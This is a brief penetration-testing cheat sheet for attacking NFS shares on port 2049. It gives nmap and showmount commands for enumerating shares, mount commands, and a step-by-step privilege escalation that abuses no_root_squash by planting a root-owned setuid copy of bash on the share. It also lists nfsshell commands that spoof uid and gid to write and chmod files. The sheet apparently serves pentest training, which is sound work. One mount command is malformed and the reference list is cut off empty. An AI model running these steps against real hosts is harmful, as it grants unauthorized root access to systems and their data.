NFS 2049

Configuration files



nmap -sV --script=nfs-*
nmap -sV --script=nfs-ls  //same result as rpcinfo
nmap -sV --script=nfs-*

Enumerate NFS shares:

showmount -e hostname/ip_address

Mount NFS shares:

mount -t nfs ip_address:/directory_found_exported /local_mount_point
mount -t nfs /tmp/mnt -nolock

/etc/exports file contains configurations and permissions of which folders/file systems are exported to remote users

Root Squashing

Root squashing - Prevents having root access to remote root users connected to NFS volume. Remote root users are assigned a user "nfsnobody" when connected.

no_root_squash - Gives the remote user root access to the connected system

With limited user account: cp /bin/bash /shared Then mount the share: mount -t nfs server:/shared /mnt/ and run chown root:root bash && chmod u+s bash Run the file with limited user account: /shared/bash


nfsshell> host <ip>
nfsshell> mount <name of the share>
nfsshell> gid 1000
nfsshell> uid 1000
nfsshell> put example
nfsshell> chmod 0777 example


New References

  • Exploiting Network File System, (NFS), shares: